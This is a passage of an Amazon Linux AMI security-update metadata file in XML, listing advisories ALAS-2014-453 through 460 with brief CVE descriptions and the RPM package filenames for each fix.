release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXvMC-debuginfo-1.0.8-2.1.8.amzn1.i686.rpm</filename></package><package name="libXvMC-devel" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXvMC-devel-1.0.8-2.1.8.amzn1.i686.rpm</filename></package><package name="libXi-debuginfo" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXi-debuginfo-1.7.2-2.2.9.amzn1.x86_64.rpm</filename></package><package name="libXi" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXi-1.7.2-2.2.9.amzn1.x86_64.rpm</filename></package><package name="libXi-devel" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXi-devel-1.7.2-2.2.9.amzn1.x86_64.rpm</filename></package><package name="libXi" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXi-1.7.2-2.2.9.amzn1.i686.rpm</filename></package><package name="libXi-devel" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXi-devel-1.7.2-2.2.9.amzn1.i686.rpm</filename></package><package name="libXi-debuginfo" version="1.7.2" release="2.2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXi-debuginfo-1.7.2-2.2.9.amzn1.i686.rpm</filename></package><package name="libXxf86dga-debuginfo" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86dga-debuginfo-1.1.4-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXxf86dga-devel" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86dga-devel-1.1.4-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXxf86dga" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86dga-1.1.4-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXxf86dga" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86dga-1.1.4-2.1.8.amzn1.i686.rpm</filename></package><package name="libXxf86dga-debuginfo" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86dga-debuginfo-1.1.4-2.1.8.amzn1.i686.rpm</filename></package><package name="libXxf86dga-devel" version="1.1.4" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86dga-devel-1.1.4-2.1.8.amzn1.i686.rpm</filename></package><package name="libXxf86vm-debuginfo" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86vm-debuginfo-1.1.3-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXxf86vm-devel" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86vm-devel-1.1.3-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXxf86vm" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXxf86vm-1.1.3-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXxf86vm-devel" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86vm-devel-1.1.3-2.1.9.amzn1.i686.rpm</filename></package><package name="libXxf86vm-debuginfo" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86vm-debuginfo-1.1.3-2.1.9.amzn1.i686.rpm</filename></package><package name="libXxf86vm" version="1.1.3" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXxf86vm-1.1.3-2.1.9.amzn1.i686.rpm</filename></package><package name="libdmx-debuginfo" version="1.1.3" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libdmx-debuginfo-1.1.3-3.7.amzn1.x86_64.rpm</filename></package><package name="libdmx" version="1.1.3" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libdmx-1.1.3-3.7.amzn1.x86_64.rpm</filename></package><package name="libdmx-devel" version="1.1.3" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libdmx-devel-1.1.3-3.7.amzn1.x86_64.rpm</filename></package><package name="libdmx-debuginfo" version="1.1.3" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libdmx-debuginfo-1.1.3-3.7.amzn1.i686.rpm</filename></package><package name="libdmx" version="1.1.3" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libdmx-1.1.3-3.7.amzn1.i686.rpm</filename></package><package name="libdmx-devel" version="1.1.3" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libdmx-devel-1.1.3-3.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-453</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-453: medium priority package update for file</title><issued date="2014-11-22 14:34:00" /><updated date="2014-11-24 12:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3710:
An out-of-bounds read flaw was found in the way the File Information (fileinfo) extension parsed Executable and Linkable Format (ELF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted ELF file.
1155071:
CVE-2014-3710 file: out-of-bounds read in elf note headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710" title="" id="CVE-2014-3710" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-debuginfo" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="python-magic" version="5.19" release="7.24.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.19-7.24.amzn1.noarch.rpm</filename></package><package name="file-libs" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="file" version="5.19" release="7.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.19-7.24.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.19-7.24.amzn1.i686.rpm</filename></package><package name="file" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.19-7.24.amzn1.i686.rpm</filename></package><package name="file-static" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.19-7.24.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.19-7.24.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.19" release="7.24.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.19-7.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-454</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-454: critical priority package update for docker</title><issued date="2014-11-25 12:22:00" /><updated date="2014-11-25 12:30:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6408:
1167506:
CVE-2014-6408 docker: potential container escalation
CVE-2014-6407:
1167505:
CVE-2014-6407 docker: symbolic and hardlink issues leading to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6407" title="" id="CVE-2014-6407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6408" title="" id="CVE-2014-6408" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="1.3.2" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-1.3.2-1.0.amzn1.x86_64.rpm</filename></package><package name="docker-pkg-devel" version="1.3.2" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-pkg-devel-1.3.2-1.0.amzn1.x86_64.rpm</filename></package><package name="docker-devel" version="1.3.2" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-devel-1.3.2-1.0.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-455</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-455: medium priority package update for kernel</title><issued date="2014-12-03 22:27:00" /><updated date="2014-12-18 14:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9322:
A flaw was found in the way the Linux kernel handled GS segment register base switching when recovering from a #SS (stack segment) fault on an erroneous return to user space. A local, unprivileged user could use this flaw to escalate their privileges on the system.
1172806:
CVE-2014-9322 kernel: x86: local privesc due to bad_iret and paranoid entry incompatibility
CVE-2014-9090:
The do_double_fault function in arch/x86/kernel/traps.c in the Linux kernel through 3.17.4 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to cause a denial of service (panic) via a modify_ldt system call, as demonstrated by sigreturn_32 in the linux-clock-tests test suite.
1170691:
CVE-2014-9090 kernel: espfix64: local DoS via do_double_fault() due to improper handling of faults associated with SS segment register
CVE-2014-7970:
The pivot_root implementation in fs/namespace.c in the Linux kernel through 3.17 does not properly interact with certain locations of a chroot directory, which allows local users to cause a denial of service (mount-tree loop) via . (dot) values in both arguments to the pivot_root system call.
1151095:
CVE-2014-7970 Kernel: fs: VFS denial of service
CVE-2014-7841:
The sctp_process_param function in net/sctp/sm_make_chunk.c in the SCTP implementation in the Linux kernel before 3.17.4, when ASCONF is used, allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) via a malformed INIT chunk.
1163087:
CVE-2014-7841 kernel: net: sctp: NULL pointer dereference in af-&gt;from_addr_param on malformed packet
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7841" title="" id="CVE-2014-7841" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7970" title="" id="CVE-2014-7970" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9090" title="" id="CVE-2014-9090" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9322" title="" id="CVE-2014-9322" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.26-24.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.26" release="24.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.26-24.46.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.26" release="24.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.26-24.46.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-456</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-456: medium priority package update for facter</title><issued date="2014-12-08 13:12:00" /><updated date="2014-12-08 13:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3248:
Untrusted search path vulnerability in Puppet Enterprise 2.8 before 2.8.7, Puppet before 2.7.26 and 3.x before 3.6.2, Facter 1.6.x and 2.x before 2.0.2, Hiera before 1.3.4, and Mcollective before 2.5.2, when running with Ruby 1.9.1 or earlier, allows local users to gain privileges via a Trojan horse file in the current working directory, as demonstrated using (1) rubygems/defaults/operating_system.rb, (2) Win32API.rb, (3) Win32API.so, (4) safe_yaml.rb, (5) safe_yaml/deep.rb, or (6) safe_yaml/deep.so; or (7) operatingsystem.rb, (8) operatingsystem.so, (9) osfamily.rb, or (10) osfamily.so in puppet/confine.
1101346:
CVE-2014-3248 puppet: Ruby modules could be loaded from the current working directory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3248" title="" id="CVE-2014-3248" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="facter" version="1.6.18" release="7.25.amzn1" epoch="0" arch="noarch"><filename>Packages/facter-1.6.18-7.25.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-457</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-457: low priority package update for clamav</title><issued date="2014-12-08 13:12:00" /><updated date="2014-12-08 13:16:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6497:
clamscan in ClamAV before 0.98.5, when using -a option, allows remote attackers to cause a denial of service (crash) as demonstrated by the jwplayer.js file.
1138101:
CVE-2013-6497 ClamAV: -a segmentation fault when processing files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6497" title="" id="CVE-2013-6497" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamd" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-data-empty" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-server" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-scanner" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-lib" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-server-sysvinit" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-milter-sysvinit" version="0.98.5" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.98.5-1.10.amzn1.noarch.rpm</filename></package><package name="clamav-milter" version="0.98.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.98.5-1.10.amzn1.x86_64.rpm</filename></package><package name="clamav-server" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamd" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.98.5-1.10.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.98.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.98.5-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-458</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-458: important priority package update for rpm</title><issued date="2014-12-09 07:34:00" /><updated date="2014-12-10 13:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8118:
It was found that RPM could encounter an integer overflow, leading to a stack-based overflow, while parsing a crafted CPIO header in the payload section of an RPM file. This could allow an attacker to modify signed RPM files in such a way that they would execute code chosen by the attacker during package installation.
1168715:
CVE-2014-8118 rpm: integer overflow and stack overflow in CPIO header parsing
CVE-2013-6435:
It was found that RPM wrote file contents to the target installation directory under a temporary name, and verified its cryptographic signature only after the temporary file has been written completely. Under certain conditions, the system interprets the unverified temporary file contents and extracts commands from it. This could allow an attacker to modify signed RPM files in such a way that they would execute code chosen by the attacker during package installation.
1039811:
CVE-2013-6435 rpm: race condition during the installation process
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6435" title="" id="CVE-2013-6435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8118" title="" id="CVE-2014-8118" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rpm-devel" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-devel-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-sign" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-sign-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-build-libs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-libs-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-python" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-cron" version="4.11.2" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/rpm-cron-4.11.2-2.58.amzn1.noarch.rpm</filename></package><package name="rpm" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-libs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-libs-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-apidocs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="noarch"><filename>Packages/rpm-apidocs-4.11.2-2.58.amzn1.noarch.rpm</filename></package><package name="rpm-debuginfo" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-debuginfo-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm-build" version="4.11.2" release="2.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-4.11.2-2.58.amzn1.x86_64.rpm</filename></package><package name="rpm" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-sign" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-sign-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-build-libs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-libs-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-devel" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-devel-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-python" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-debuginfo" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-debuginfo-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-build" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-4.11.2-2.58.amzn1.i686.rpm</filename></package><package name="rpm-libs" version="4.11.2" release="2.58.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-libs-4.11.2-2.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-459</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-459: medium priority package update for openvpn</title><issued date="2014-12-10 13:25:00" /><updated date="2014-12-10 13:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8104:
OpenVPN 2.x before 2.0.11, 2.1.x, 2.2.x before 2.2.3, and 2.3.x before 2.3.6 allows remote authenticated users to cause a denial of service (server crash) via a small control channel packet.
1166910:
CVE-2014-8104 openvpn: authenticated user can DoS OpenVPN by sending a too-short control channel packet to server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8104" title="" id="CVE-2014-8104" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.3.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.3.6-1.12.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.3.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.3.6-1.12.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.3.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.3.6-1.12.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.3.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.3.6-1.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-460</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-460: medium priority package update for php-ZendFramework</title><issued date="2014-12-11 14:23:00" /><updated date="2014-12-11 14:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8089:
1151277:
CVE-2014-8089 php-ZendFramework: SQL injection issue when using the sqlsrv PHP extension (ZF2014-06)
CVE-2014-8088:
The (1) Zend_Ldap class in Zend before 1.12.9 and (2) Zend\Ldap component in Zend 2.x before 2.2.8 and 2.3.x before 2.3.3 allows remote attackers to bypass authentication via a password starting with a null byte, which triggers an unauthenticated bind.
1151276:
CVE-2014-8088 php-ZendFramework: null byte issue, connect to LDAP without knowing the password (ZF2014-05)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8088" title="" id="CVE-2014-8088" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8089" title="" id="CVE-2014-8089" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-full" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.9" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.9-1.10.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.9" 